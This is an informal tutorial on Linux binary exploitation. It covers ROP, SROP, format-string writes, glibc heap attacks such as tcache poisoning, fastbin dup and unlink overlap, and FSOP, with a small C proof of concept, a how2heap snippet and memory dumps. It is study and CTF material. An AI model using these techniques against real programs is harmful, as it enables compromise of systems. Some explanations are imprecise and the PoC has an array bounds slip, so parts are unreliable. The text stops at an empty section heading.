================================================================================
                    BINARY EXPLOITATION MANUALS by s4yHi
================================================================================

I advise you to read it if you already have any knowledge about PWN... but you
can find out something new that will be interesting to learn.
At the bottom of this article you can find various concrete exploitation cases
including those I have faced.
Sorry for my imperfect English :)

================================================================================
1. BASICS
================================================================================

1.1 x86_64 Calling Convention
------------------------------------------------------------------------------

If a function expects no more than 6 arguments, arguments are put into:

    1. rdi
    2. rsi
    3. rdx
    4. rcx
    5. r8
    6. r9

Else remainder is put into the stack.

For syscall (syscall number in rax):

    1. rdi
    2. rsi
    3. rdx
    4. r10
    5. r8
    6. r9

So, if we want to "hack" any program we must understand how it works.
For example: if I could replace some function to "system()" I need to put
an argument to rdi for a proper call.


1.2 Stack Layout
------------------------------------------------------------------------------

Stack includes:

    1. Buffer
    2. Stack frame pointer (SFP)
    3. Return address

Buffer = our data
SFP    = address of previous SFP (for correct returning after callbacks)
Return address = address where we'll be after end of a function [ret = pop rip]

If we can control the length of buffer and can go out from buffer's size range,
we can rewrite neighbour data including SFP & return address => we can transfer
control anywhere -- to any address.

This is the basis of ROP.

The latest data in the stack has the lowest address.


1.3 Endianness
------------------------------------------------------------------------------

Any data is read/written with little-endian notation (excluding network stack),
because it makes it easier to extend range of integers and do arithmetical
operations (from the lowest bytes to the highest).

Example: in a 64-bit chunk of memory 0xdeadbeefcafebabe will become
0xbebafecaefbeadde => important to pack our data properly (addresses especially).


1.4 ELF Structure
------------------------------------------------------------------------------

Any executable file on Linux has this structure:

    1) Code segment [r-x as usual] - read & executable section. Collection of
       instructions for the central processor unit.

    2) Data segment -- separated into 3 types:

       > data [rw-]   - read & write section. Static variables (C keyword).
                        Keeps the whole image of data during the life of a process.
       > rodata [r--] - read section. Also static, but immutable variables.
                        "Mechanical" protection => Any attempt to write = segfault.
       > bss [rw-]    - blank static symbol - reserved data for variables.
                        Keeps only addresses of variables instead of the whole
                        image like data.

    3) Stack segment [rw- or rwx] - basically a pool for our data. Sometimes,
       if protection of a program is totally absent, it's executable.
       Includes stack frames.

    4) Heap segment [rw-] - a big pool for dynamic data. We can manipulate it
       with malloc/free.


1.5 Memory Mappings
------------------------------------------------------------------------------

Any C program includes:

    1) Executable file with code & data segments & .plt & .got sections
    2) Heap (if at least one malloc was called)
    3) Local-Thread Storage (includes important information about current thread,
       for example - address of tcache_perthread_struct)
    4) Linked libc - our treasure with all ROP-gadgets, all functions and
       strings which are needed for exploitation
    5) Linker - resolver for lazy binding
    6) Stack - space for static data


1.6 Common Protections
------------------------------------------------------------------------------

With checksec utility you can find protections of your binary:

    1) NX     - No eXecutable stack
    2) ASLR   - Address Space Layout Randomization - any mapping excluding your
                binary file has randomized addresses
    3) PIE    - Position Independent Executable - your binary file deployed
                at a random address
    4) RELRO  - Relocation Read-Only - Protection of some system data.
                For example .got, .plt.got are [rw-] or [r--]
    5) Canary - A stack value which controls stack overflows (basically a
                random value compared at the end of a function)


================================================================================
2. STACK EXPLOITATION
================================================================================

2.1 Buffer Overflow
------------------------------------------------------------------------------

If you can control length of input you can go out from the size range of one
variable to rewrite data of a neighbour variable.
For example you can rewrite a pointer to some handler or method of a structure.
Don't forget that later data has the lower address.


2.2 Stack Overflow
------------------------------------------------------------------------------

If you can control length of input to reach SFP & return address you just can
rewrite the last of them. If you do this, RIP will put into itself the rewritten
address and go to your instruction.
For example: in some cases you can pass any checkings to reach a necessary
code fragment.


2.3 Return Oriented Programming (ROP)
------------------------------------------------------------------------------

If you have a primitive to write data of such size as to rewrite not only the
return address, you can make a ROP-chain.

ROP-chain - collection of assembly instructions to transfer control to your own
"code". As usual, ROP-chains are assembled from binary (if all necessary gadgets
are included in the binary) or from GLIBC (trust me, you can find here almost
anything for exploitation. Not only gadgets for ROP-chain).

Example: after you made sure that you can rewrite stack data as you need, you
can assemble a ROP-chain. As usual its length is from 24 bytes to 64. We can
not worry about data under the return address, because after completing our code
we'll get a new valid stack context or even get a reverse shell.

    pop rdi ; ret -> '/bin/sh\x00' address -> ret -> system("/bin/sh\x00")

So, rdi will get an address of /bin/sh and system will give us a shell.
But a lot of libc functions make operations like <movaps> which need 0x10
stack alignment. The return address isn't aligned at 0x10 and after putting
the ROP-chain to stack, if we are calling a libc function, we must be sure
that after calling the stack will be aligned at 0x10
(the lowest address % 0x10 == 0).


2.4 Stack Pivoting
------------------------------------------------------------------------------

If you find [ pop rsp ; ret | xchg rax, rsp ; ret ] or something like that
(to handle the stack pointer) you can move rsp to a controlled space (stack or
heap - doesn't matter, just a controlled data segment, even .data or .bss).

This can be useful if you cannot rewrite such space after SFP for a proper
ROP-chain. Just move your rsp to a stack part which you already have prepared
(put whole ROP-chain) and execute your "code".

Example of a ROP-chain for stack-pivoting:

    pop rsp ; ret -> <data address> -> pop rax ; ret -> <execve syscall>
    -> pop rdi ; ret -> </bin/sh address> -> pop rsi ; ret -> <0 or args>
    -> pop rdx ; ret -> <0 or environ> -> syscall <=> We got a shell

And I should mention the stack-red-zone (128 bytes unpper $rsp) - this place is
used by kernel signals and it uses this space for their metadata (after a signal,
data at the stack can be corrupted).

Don't forget about 'leave' instruction ( expand to : mov rsp, rbp ; pop rbp ). 
It can will be useful if you detected address at the $rbp which you need. 
For example - main-looping of a prog (when you call main or _start twice or more
via .fini_array overwrite (look bonus 5.6))

2.5 Sigreturn Oriented Programming (SROP)
------------------------------------------------------------------------------

If you have a primitive to write large data or can make stack-pivoting you can
set registers without gadgets (you need just pop rax ; ret & syscall or
pop rsp ; ret and an address if you want to pivot stack).

So, you just need to put a SIGCONTEXT structure into the data. The library
sigcontext.h includes the signature of this structure.

First of all you should put your ROP-chain to the top of the stack and after
it put your sigcontext structure. After the syscall, the kernel will take your
structure and set all registers (don't forget about segment registers) as you
have written them to the structure. And after that you can just call system()
or another function.

But not only the sigreturn syscall uses this concept. For example - setcontext()
in the glibc.


2.6 Partial Overwrite
------------------------------------------------------------------------------

ASLR doesn't randomize the last 12 bits of an address and the 8 first bits
(PIE too) and you can just overwrite the 12 last bits of a randomized address
to the last 12 bits of a static offset and try to get the target address
(if the difference between leaked and target is below 4096 bytes).

For example: you can rewrite 1 byte of an address and you don't know the
address at the return address or address from .got section or something else.


================================================================================
3. FORMAT STRING EXPLOITATION
================================================================================

3.1 Arbitrary Read
------------------------------------------------------------------------------

If a program has printf without format string you can leak almost anything with
your own format string. Look at the signature:

    1) %p    - print a pointer (if you put %p %p %p %p %p to a buffer which
               using printf - you'll get at stdout 5 pointers from the stack
               during printf execution)
    2) %s    - print a string
    3) %k$p  - print pointer at RSP + (k * 8) position on the stack
               (%k$r works for any format-string prefix. It prints the k-th
               element on stack with 'r' format)

So, you can leak an address from the stack, libc or heap and with GDB calculate
the base of those segments => calculate any data and instruction by fixed offset.
As usual it is all we need for exploitation.


3.2 Arbitrary Write
------------------------------------------------------------------------------

If a program also has a format string vulnerability you can use "%n" prefix to
write the count of written bytes to stdout to an address. It's a very powerful
equipment for scoping-rewriting of data (first of all - you can pass the stack
canary checking and rewrite the return address).

It has 3 variants:

    1. "%n"   - write 4 or 8 bytes of output length
                I don't advise using it because to write 4 bytes of data
                it's too large (stdout can't put such count of bytes > 0x10000000)

    2. "%hn"  - write 2 bytes of output length
                Probably good for one partial overwrite. Still 0x1000 < bytes
                but already not bad

    3. "%hhn" - write 1 byte of output length
                Ok! The most accurate way to rewrite bytes, but it needs a
                longer payload

Example: you leaked the stack address and calculated the target. So, you can
assembly payloads like this:

    "%'a'c%'k'$hhn" + <address of 1st byte>
    But you can't combine several position depended %hhn, because when compiler is seeing '$' specificator, 
    printf transfers control to position_printf (buf count of '$' depends from current OS and build)
    [ I'll give more info in next commits ]
    which looks at the all format-string specificator 
    which creates his own stack and put all of arguments from original printf args. 
    So, it means that you can do one address rewrite during such format-string arbitrary-write attack
    To rewrite more than one 1 or 2 bytes you should find a way to call printf twice or more times

%ac puts 'a' chars (0x20 as usual) and %k$hhn puts 'a' to the k-th address on
the stack. First of all you need to check which position your buffer has on the
stack and after this find your 'k' for each address.
And you should read what your own format string includes. To find the correct "k".
Don't forget to make a subtraction of the second and other %bc (b = your value - a),
because %n writes the length of only printable characters - it's passing format
strings. And after first writing the "counter" adds 'a' to itself.

================================================================================
4. HEAP EXPLOITATION
================================================================================

4.1 Chunk Structure
------------------------------------------------------------------------------

    1) prev_size (8 bytes) - used to put here the address of the free upper chunk.
       If the upper chunk isn't free, the prev_size field can be overwritten by
       the upper-chunk's data.

    2) size (8 bytes with flags) - used to save the own size of the chunk.
       It is always more than malloc(size) by 0x10 (0x10 == sizeof(chunk_header)).
       Also includes flags.

    3) flags (3 lowest bits):
       a) PREV_INUSE     = 1 if upper chunk is not free. Else 0. Lowest bit [0]
       b) IS_MAPPED      = 1 if current chunk mapped with MMAP syscall. Else 0.
                           Second bit from lowest [1]
       c) NOT_MAIN_ARENA = 1 if current chunk not allocated from current thread.
                           Else 0. Highest bit from the 3 lowest [2]

    4) forward chunk  (fd) - address of next chunk
    5) backward chunk (bk) - address of previous chunk

P.S. Tcache & fastbin have Safe-Linked concept which means that "raw addresses"
are not decoded in the fd / bk.
Safe linked aka mangling address is calculated by this formula:
(current_address SHR 12) XOR target_address (SHR == Shift Right)

Also tcache & fastbin are cyclic-one-side lists, so only fd pointer is used.
However, tcache has a special key which is put after free() if the freed chunk
is pushed into tcache.


4.2 Pools and Bins for Freed Chunks
------------------------------------------------------------------------------

1) TCACHE - fast cache for fast push/pop chunks. LIFO. Includes 64 dword
   writings about the count of chunks in the bins & 64 entries field
   aka next free chunk.

   Pseudostructure of tcache_perthread_struct (tps):

       tcache_perthread_struct = {
           uint16_t counts[64];
           uint64_t entries[64];
       }

   where counts has range [0, 7] (max 7 chunks at a bin) and entries include
   the address of the next chunk for allocation. So, size of tps is:
   2 * 64 + 8 * 64 = 640 = 0x280 bytes as usual (maybe it has alignment, be
   sure that you are working with the proper size. With flag PREV_INUSE it
   equals 0x281 bytes).

   After free(), if a chunk was pushed to a tcache bin, the 2nd qword becomes a
   Safe-Linked address of the next free chunk and the 3rd qword becomes a key of
   tps (it is randomized at each start of a program and saved at LOCAL THREAD
   STRUCTURE. The cause of it - saving the heap from double free vulnerability.
   So, after free() the tcache is checked: (does the current chunk have a 3rd
   qword which equals the key) ? [tcache_dup error] : [successfully pushing].

   P.S. forward pointer points to the 2nd qword of chunk (always 2nd - 3rd
   qwords - allocator's data) but the upper chunk has a "header" which includes
   PREV_SIZE & SIZE fields.
   
   Only this bin points to the data of next chunk   (offset + 0x10)
   Other bins points to the header of next chunk    (offset + 0x0)
   
   As you can understand, if we can control fd pointer of tcache chunk via uaf primitive
   we'll can make arbitrary allocation to get arbitrary write primitive.
   This is a tcache poinsoning technique. In old versions (glibc < 2.32) you could just
   overwrite fd pointer but in newer versions Save-Linking exist.
   It means that you also need have a heap leak to shift and xor addresses.
   And you also must care about counts. 
   To the moment of arbitrary allocation at the counts with properly size at least one chunk must be.
   Else glibc allocator just separates top chunk and returns new chunk.

2) FASTBIN - also quick pool to push/pop chunks, but chunks go here only if
   the appropriate bin in the tcache is already full. Range of sizes which can
   be pushed to fastbin: [0x20 - 0x80 (inckuding header)]. 
   Also LIFO - cyclic-one-binded list.
   Also has safe-linking but has no key. Potentially struct for double free
   (fastbin_dup vulnerability) - fastbin doesn't make strict checks unlike
   tcache and just compares the last freed chunk with the required to free
   chunk. If they are equal => !faststop. Else ok.

   So, we can allocate 7 chunks, free() 7 of them to fully fill tcache and
   allocate 3 more chunks A, B and C (for C separate B from top chunk
   concatenation [read point 4]).

   Then free(A), free(B) to pass !faststop and free(A) again.

   Step by step:

       1. free(A) : A -> NULL
       2. free(B) : B -> A -> NULL
       3. free(A) : A -> B -> A -> B -> ... -> A -> B -> ...

   We'll get a cyclic list because in memory we have only 2 chunks but try to
   "free 3 chunks". And physically A will point to B after second free().
   So, when we allocate an A chunk we can rewrite the 'fd' pointer (don't
   forget about safe-linking) and A will point to the rewritten address:

       B -> A -> Write-What-Where address

   And after B and A allocation the next address will point to whatever address
   we rewrote.
   Final step - call one more malloc to allocate a chunk in arbitrary memory.

   A little comment:
   Since glibc 2.41 to reach fastbin chunks we must move them to tcache.
   So, after double free in fastbin_dup we must free tcache (just malloc
   the freed first 7 chunks again) and the allocator will move our double
   freed chunks to the tcache after the next allocation.

   Example from how2heap (abbreviated):

       for (int i=0; i<7; i++) {
           ptrs[i] = malloc(8);
       }

       int *a = malloc(8);
       int *b = malloc(8);
       int *c = malloc(8);

       for (int i=0; i<7; i++) {
           free(ptrs[i]);
       }

       free(a);
       free(b);
       free(a);

       for (int i = 0; i < 7; i++) {
           ptrs[i] = malloc(8);
       }

       a = malloc(8);
       b = malloc(8);
       c = malloc(8);

       'a' will equal 'c' and if we write the safe-linked address to 'a',
       the next allocation will return a chunk at the rewritten address.
       
   Read bonus 6.11 to know about unaligned malloc with fastbin sup (before glibc 2.41)

3) MAIN ARENA BINS:

   3.1) Unsorted bin (index == 1) - this place is a FIFO cyclic-two-binded
        list. If a chunk with the appropriate size already doesn't fit into a
        tcache bin & fastbin (or its size is above 0x80 bytes) it is pushed to
        the unsorted bin or an absolutely matching chunk in tcache & fastbin
        is not found, so we go to the check: if unsorted/small/large bins
        include a chunk whose size is more than user required => the chunk
        will be separated and the chunk with the required size will be returned
        to the user and the remainder will be pushed to the unsorted bin.
        The last freed chunk will be put between the head and the last freed chunk.

   3.2) Small bins (indexes 2 - 63) - store exact size classes from 16 bytes
        to 512 bytes (on 64-bit arch, step 16 bytes). If the tcache bin for a
        specific size is full (default max 7 chunks), the excess chunks are
        evicted and pushed to the corresponding small bin. Structure is a FIFO
        doubly linked list. All chunks in one small bin have exactly the same size,
        so allocation returns the first chunk without splitting. They will be used
        only if an exact match is required (small bins don't separate).

   3.3) Large bins (indexes 64 - 127) - store chunks with sizes larger than
        512 bytes. Unlike small bins, each large bin holds chunks of varying
        sizes within a specific range. Chunks inside large bins are sorted by
        size in descending order. To optimize search, chunk structure includes
        additional fields fd_nextsize and bk_nextsize which link only chunks
        with different sizes for faster best-fit traversal. If chunk size >
        requested, it will be separated and the remainder will be pushed back
        to the unsorted or large bin.


4) TOP CHUNK - large space for allocation if no proper chunks for allocation
   exist. It will be separated and the remainder will be returned to the top
   chunk if the top chunk's size is more than the size required, else the
   current top chunk will be freed with _int_free() and put to the unsorted
   bin and a new top chunk will be created at the end address of the current one.
   And the new top chunk will be separated by the same logic. If a freed chunk
   is a neighbour of the top chunk they will be concatenated (the chunk won't
   be put to bins or tcache).

   In conclusion I need to add something about mmaped chunks. If malloc requires
   a range count of bytes which is above MMAP_THRESHOLD (global variable from
   glibc) - new free pages will be "linked" to the process. As usual - between
   glibc's and ld's address space. After free() those pages will be returned
   to the operating system.


4.3 House of Orange
------------------------------------------------------------------------------

If you have a writing primitive (buffer overflow or arbitrary write) in the heap
and you need to leak a libc address or heap address and the code has no free(),
you can use an exploitation technique like House of Orange to trigger _int_free()
and put the top-chunk into the unsorted bin. You also need a reading primitive
to get a leak of an address.

If during malloc() we can't find a chunk with the required size and the unsorted
bin is empty we'll try to separate the top chunk (the separated part will be
returned and the remainder of the top chunk will move to the "top").

But if the size of the top chunk is less than the size of the required chunk
(and the size of the required chunk is less than MMAP_THRESHOLD) it will be
freed with _int_free() and put into the unsorted bin and the heap will load
new pages to place a new large top chunk here.

The new size of the top chunk must be aligned by 0x1000 bytes (with current
flags condition). It means that the last qword of our modified top chunk must
have address 0x1000 - 0x8. All of this is to pass an error when new pages
will be loaded (page address must be aligned by 0x1000 bytes).

So, we just have to read the address of the main arena bins via our reading
primitive. It will be situated at +0x0 and +0x8 offset from the content of
the freed chunk.

And the interesting moment: when we use _int_free() via House of Orange, at
the last qword of the allocated chunk (after the next malloc with a proper
address [not absolute equals to tcache chunks and fastbin chunks]) we'll have
a heap address which points to the header of this chunk and the next allocations
will return chunks and their last qword will also point to their header.

It means that we can leak a libc address if we have a way to do this (maybe the
process doesn't overwrite main arena addresses and we can get a leak with valid
reading of content) and we can leak the heap address after a valid malloc via
reading the whole content (including the last qword) of the chunk.

Example:

    0x55f68ab79290:  0x0000000000000000  0x0000000000000021  <- here we allocated evil chunk with overflow
    0x55f68ab792a0:  0x0000000000000010  0x0000000000000001  <- valid chunk data
    0x55f68ab792b0:  0x6161616161616161  0x0000000000000d31  <- user-control field (overwrite size of top chunk)
                                                               and next qword is SIZE with PREV_INUSE = 1
                                                               (then address will be less than this)
    0x55f68ab792c0:  0x00007fc371619ce0  0x00007fc371619ce0  <- after malloc with required size more than 0xd30
                                                               top chunk will be freed and put to 'fd' & 'bk'
                                                               pointer to main arena bin

    0x55f68ab79290:  0x0000000000000000  0x0000000000000021
    0x55f68ab792a0:  0x0000000000000010  0x0000000000000001
    0x55f68ab792b0:  0x6161616161616161  0x0000000000000021  <- allocated chunk from unsorted bin via freed
                                                               top chunk separation
    0x55f68ab792c0:  0x0000000000000010  0x0000000000000001  <- valid chunk data (if code wouldn't have self-chunk
                                                               modifying we would have addresses of main arena)
    0x55f68ab792d0:  0x000055f68ab792b0  0x0000000000000d11  <- here! last qword of allocated chunk points to
                                                               0x000055f68ab792b0 (header of allocated chunk)
                                                               [because data of chunk can rewrite PREV_SIZE of
                                                               next chunk]
    0x55f68ab792e0:  0x00007fc371619ce0  0x00007fc371619ce0  <- remainder after separation was put into unsorted
                                                               bin again

4.4 House of Spirit
------------------------------------------------------------------------------

If process uses pointer which malloc returns and :
	1. you can control it
	2. you have an address of the target and you can control it's data
you'll can use this technique to arbitrary write via malloc.

All of you need - create 2 fake chunks. The second one after the first.
With properly structure (header + data). But we actually only do care about headers of them.
I advice you to add PREV_INUSE flags for both to bypass consolidation.

And after that grooming you need to free the first of them via overwritten saved pointer.
Allocator will interpretate the first chunk as valid because they have a valid structure.
Let's repeat : data aligned, headers with PREV_INUSE, chunks have properly distance beetwen them.

			   <header of 1st chunk>
	0xffed1608:     0x00000000      0x00000041      0x61616161      0x61616161
	0xffed1618:     0x61616161      0x61616161      0x61616161      0x61616161
	0xffed1628:     0x61616161      0x61616161      0x61616161      0x61616161
	0xffed1638:     0x61616161      0x61616161      0x61616161      0x61616161
	0xffed1648:     0x00000000      0x00000041      <==  <header of 2nd chunk>
	0xffed1658:     0xffed1678      0x08048908      0xf7fc1d60      0x080462a0
	0xffed1668:     0x0804891b      0x00000000      0xf7fc1000      0xf7fc1000
	0xffed1678:     0x00000000      0xf7e29637      0x00000001      0xffed1714
	0xffed1688:     0xffed171c      0x00000000      0x00000000      0x00000000
	
As you can see, data doesn't matter (obviously).

So, we need free chunk with address 0xffed1610 via ptr overwrite.
After this it will be put into the tcache/fastbin and next allocation returns 0xffed1610.
To free unsorted bin look at the bonus 6.9

4.6 Unsorted bin attack (glibc < 2.29)
------------------------------------------------------------------------------

If we can control unsorted bin chunk's "bk" field we can put address of main_arena to arbitrary address.
All of we need - trigger glibc macro to exclude victim from unsorted and return it or put to small/large bins.
We can do this because macro has this part :

	bck = victim->bk;  	
	unsorted_bin(av)->bk = bck;  	
	bck->fd = unsorted_bin(av);
	
And address of main_arena (large positive value) will be put to the rewritten bk + 0x10.
But the next allocation can crash the process because heap structure was corrupted but IF ONLY chunk returns via malloc
(unlink when chunk returns to user). 
In the another context (allocator moves chunk to small/large bins) attack crashes process during the same malloc, 
because corrupted chunk from small bin will be also checked to valid structure. 
But allocator will find incorrect size and call malloc_printerr() -> abort().

I used it to rewrite _IO_list_all address to main arena address because smallbins so close to it and
if freed chunk with payload will be situated at +0x68 offset (_chain field of _IO_file) (small[4]) we can transfer control at all.
It crashed the process but I already have all what I need to FSOP.

4.7 Overlapping chunks via unlink
------------------------------------------------------------------------------

Even in modern versions of glibc this vulnerability exist. 
Concept is do free chunk to unsorted bin to merge it with the prepared upper fake chunk.

According flags for it to work PREV_INUSE of second victim must be zero. We can do this if off-by-one/null or overflow exist.
And we must do a fake chunk to pass allocator validation of fd/bk ptrs in the first victim. This is a main rule :

	(P->fd->bk == P) && (P->bk->fd == P)
	
And our problem is turning to :

	1. leak addresses where pointer to this chunk
	2. small heap fend-shui
	3. control of prev_inuse flag via vuln
	
When we got address where situate ptr to this chunk we can put this address with offset - 0x18 to the "fd" and with offset - 0x10 to the "bk".
It will work because "fd" address will be interpreted as chunk structure where "bk" field has offset 3 qwords from the beginning
and the same logic for "bk" - at this address field with offset 2 qwords will be checked. 
Also don't forget that unsorted bin ptrs points to the header of the next chunk (mchunkptr) unlike tcache - it's fd points to data (mem).
Finally, we put size of our fake chunk to "prev_size" field of the second victim and set PREV_SIZE to zero via vuln.
But be care about sizes. Allocator expects properly chunk strcuture at second victim's address - prev_size.

This is my poc :

	#include <stdlib.h>

	int main() {
		char* p[8] = {};

		for (int i = 0; i < 9; ++i) { p[i] = malloc(0x80); }
		
		/* chunk between last allocated and top chunk to bypass consolidate after free */
		malloc(0x10);

		for (int i = 0; i < 7; ++i) { free(p[i]); }

		/* HEAP FENG-SHUI VIA LEGITIMATE CHUNK */
		*(long long*)(p[7]) = 0;
		*(long long*)(p[7] + 8) = 0x81;
		*(long long*)(p[7] + 16) = (long long)(&(p[7]) - 3);
		*(long long*)(p[7] + 24) = (long long)(&(p[7]) - 2);

		/* VULNERABILITY */
		*(p[8] - 8) &= ~0xf; 
		*(p[8] - 16) = 0x80; 

		/* trigger */
		free(p[8]);
		
		return 0;
	}
	
And the memory dump :

	Before free() : 
	
		0x5555555596f0: 0x0000000000000000      0x0000000000000091 <== legitimate chunk
		0x555555559700: 0x0000000000000000      0x0000000000000081 <== groomed fake chunk
		0x555555559710: 0x00007fffffffdbf0      0x00007fffffffdbf8 <== fd & bk 
					...
		0x555555559780: 0x0000000000000080      0x0000000000000090
					...
		0x555555559810: 0x0000000000000000      0x0000000000000021
		0x555555559820: 0x0000000000000000      0x0000000000000000
		0x555555559830: 0x0000000000000000      0x00000000000207d1
		
	Let's look at what we have at fd & bk :
	
		0x7fffffffdbf0: 0x0000555555559550      0x00005555555595e0
		0x7fffffffdc00: 0x0000555555559670      0x0000555555559700 <== bk points to P
		
		0x7fffffffdbf8: 0x00005555555595e0      0x0000555555559670
		0x7fffffffdc08: 0x0000555555559700      <== fd points to P
		
	And chunk at 0x555555559780 - prev_size :
	
		0x555555559700: 0x0000000000000000      0x0000000000000081
		0x555555559710: 0x00007fffffffdbf0      0x00007fffffffdbf8
		
	After free() :
	
		0x5555555596f0: 0x0000000000000000      0x0000000000000091
		0x555555559700: 0x0000000000000000      0x0000000000000111
		0x555555559710: 0x00007ffff7e15c20      0x00007ffff7e15c20
					...
		0x555555559780: 0x0000000000000080      0x0000000000000090
					...
		0x555555559810: 0x0000000000000110      0x0000000000000020
		0x555555559820: 0x0000000000000000      0x0000000000000000
		0x555555559830: 0x0000000000000000      0x00000000000207d1
		
	Here we are. Allocator successfully consolidated our fake chunk (1st victim) with 2nd victim.
	And prev_inuse & prev_size were set at the last chunk at 0x555555559810. 
	The next malloc with 0x100 returns 0x555555559710 :
	
		gef➤  call (char*)malloc(0x100)
		$1 = 0x555555559710 " \\\341\367\377\177"
		
	Impact of this technique depends on your imagination :)
	You can make fake chunk not only at the upper chunk. 
	Better make this with spread to pinch valid chunk beetween victims and probably according a programm logic
	with a next allocation you can fill that area as whole chunk to overwrite fd & bk of pinched chunk to trigger fastbin/tcache poisoning.
	Or you can get uaf primitive because 1st victim still not freed for allocator and it opens a way to unsorted bin attack, for example.

================================================================================
5. FILE-STREAM ORIENTED PROGRAMMING
================================================================================

File-stream oriented programming aka FSOP is technique which concept is _IO_FILE_plus struct's low-level callbacks overwrite
via substitution of vtable (_IO_file_jumps struct) pointer or vtable struct's fields (just like GOT-overwrite) if it's possible

5.1 key glibc FILE structures
------------------------------------------------------------------------------

This is a declaration of beginning of the FILE stucture :

	struct _IO_FILE
	{
	  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

	  /* The following pointers correspond to the C++ streambuf protocol. */
	  char *_IO_read_ptr;	/* Current read pointer */
	  char *_IO_read_end;	/* End of get area. */
	  char *_IO_read_base;	/* Start of putback+get area. */
	  char *_IO_write_base;	/* Start of put area. */
	  char *_IO_write_ptr;	/* Current put pointer. */
	  char *_IO_write_end;	/* End of put area. */
	  char *_IO_buf_base;	/* Start of reserve area. */
	  char *_IO_buf_end;	/* End of reserve area. */

	  /* The following fields are used to support backing up and undo. */
	  char *_IO_save_base; /* Pointer to start of non-current get area. */
	  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
	  char *_IO_save_end; /* Pointer to end of non-current get area. */

	  struct _IO_marker *_markers;

	  struct _IO_FILE *_chain;

	  int _fileno;
	  int _flags2;
	  __off_t _old_offset; /* This used to be _offset but it's too small.  */

	  /* 1+column number of pbase(); 0 is unknown. */
	  unsigned short _cur_column;
	  signed char _vtable_offset;
	  char _shortbuf[1];

	  _IO_lock_t *_lock;
	  
	  __off64_t _offset;
	  void *_codecvt;
	  void *_wide_data;      
	  struct _IO_FILE *_freeres_list;
	  void *_freeres_buf;
	  size_t __pad5;
	  int _mode;              
	  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
	};
	
FILE hexdump (stdout for example):

	0xf7fcbd60 <_IO_2_1_stdout_>:   	0xfbad2887      0xf7fcbda7      0xf7fcbda7      0xf7fcbda7	
	0xf7fcbd70 <_IO_2_1_stdout_+16>:        0xf7fcbda7      0xf7fcbda7      0xf7fcbda7      0xf7fcbda7
	0xf7fcbd80 <_IO_2_1_stdout_+32>:        0xf7fcbda8      0x00000000      0x00000000      0x00000000
	0xf7fcbd90 <_IO_2_1_stdout_+48>:        0x00000000      0xf7fcb5a0      0x00000001      0x00000000
	0xf7fcbda0 <_IO_2_1_stdout_+64>:        0xffffffff      0x0a000000      0xf7fcc870      0xffffffff
	0xf7fcbdb0 <_IO_2_1_stdout_+80>:        0xffffffff      0x00000000      0xf7fcb4e0      0x00000000
	0xf7fcbdc0 <_IO_2_1_stdout_+96>:        0x00000000      0x00000000      0xffffffff      0x00000000
	0xf7fcbdd0 <_IO_2_1_stdout_+112>:       0x00000000      0x00000000      0x00000000      0x00000000
	0xf7fcbde0 <_IO_2_1_stdout_+128>:       0x00000000      0x00000000      0x00000000      0x00000000
	0xf7fcbdf0 <_IO_2_1_stdout_+144>:       0x00000000      0xf7fcaac0	<== _IO_jump_t
	
And this is a declaration of vtable structure :

	struct _IO_jump_t
	{
	    JUMP_FIELD(size_t, __dummy);
	    JUMP_FIELD(size_t, __dummy2);
	    JUMP_FIELD(_IO_finish_t, __finish);
	    JUMP_FIELD(_IO_overflow_t, __overflow);
	    JUMP_FIELD(_IO_underflow_t, __underflow);
	    JUMP_FIELD(_IO_underflow_t, __uflow);
	    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
	    /* showmany */
	    JUMP_FIELD(_IO_xsputn_t, __xsputn);
	    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
	    JUMP_FIELD(_IO_seekoff_t, __seekoff);
	    JUMP_FIELD(_IO_seekpos_t, __seekpos);
	    JUMP_FIELD(_IO_setbuf_t, __setbuf);
	    JUMP_FIELD(_IO_sync_t, __sync);
	    JUMP_FIELD(_IO_doallocate_t, __doallocate);
	    JUMP_FIELD(_IO_read_t, __read);
	    JUMP_FIELD(_IO_write_t, __write);
	    JUMP_FIELD(_IO_seek_t, __seek);
	    JUMP_FIELD(_IO_close_t, __close);
	    JUMP_FIELD(_IO_stat_t, __stat);
	    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
	    JUMP_FIELD(_IO_imbue_t, __imbue);
	#if 0
	    get_column;
	    set_column;
	#endif
	};
	
Finally, whole FILE* struct includes both of that declarations :

	struct _IO_FILE_plus
	{
	  _IO_FILE file;
	  const struct _IO_jump_t *vtable;
	};
	
So, as you can see - these are just a collection of meta-pointers and callbacks to handle any event (read/write/close and other) 

5.2 What if we overwrite some fields?
------------------------------------------------------------------------------

For example, I explain you on created FILE via fopen. Look : man "fopen(3)". 
It just creates _IO_FILE_plus at the heap and returns the pointer to created chunk.
Standart file streams stored in libc address space.

Ok, we have a several ways to reach control :

	1. Overwrite pointer to _IO_FILE_plus	(fine, just overwrite pointer to prepared memory space with fake FILE, 
						but we must do care about whole FILE with _IO_jump_t if we work in glibc >= 2.24)
						
	2. Overwrite pointer to _IO_jump_t	(well - don't touch whole FILE. Just substitute vtable pointer. 
						But works only glibc < 2.24 if address isn't in libc range!)
						
	3. Overwrite concrete callback		(good - scoping fire without whole struct corruption, 
						but if only vtables aren't in .rodata section - probably not)

Each case need two conditions - arbitrary write & addresses knoledge.

Let's suppose that you have the first case. You have overwritten the FILE pointer to your prepared menory space, suppose .data in binary with -no-pie.
The best practice - copy initial _IO_FILE struct, just change vtable. 
But depends to context we can set pointers what we need (read/write base/start/end ptrs, flags, markers and other), but this is already more advanced technique.

When programm uses fclose() it pulls JUMP_FIELD(_IO_close_t, __close) from vtable (offset + 18 * BITS).
It means that if we overwrite 18-th dword/qword (depends on i386/amd64 architecture), fclose will pull our address instead of original __close().
p.s. it maybe pulls JUMP_FIELD(_IO_finish_t, __finish), but according my experience - firstly fclose trigger especially __close().

read-functions pull JUMP_FIELD(_IO_xsgetn_t, __xsgetn). Offset 9-th dword/qword. The same logic, just like fclose, but another offset.
write-functions - JUMP_FIELD(_IO_xsputn_t, __xsputn). Offset 8-th.

Another callbacks called from __close, __xsgetn/putn (mostly). 
That's all what you need to know at the beginning.

Well, but in the glibc 2.24 and newer versions we have a one obstacle - vtable address validation. 
It must be in range of special space among libc addresses. 
It means that we can't just overwrite vtable pointer to arbitrary address with fake vtable.
All of these have become a cause of appearing of several following exploitation techniques.

5.2 Vtable Protections Bypass
------------------------------------------------------------------------------

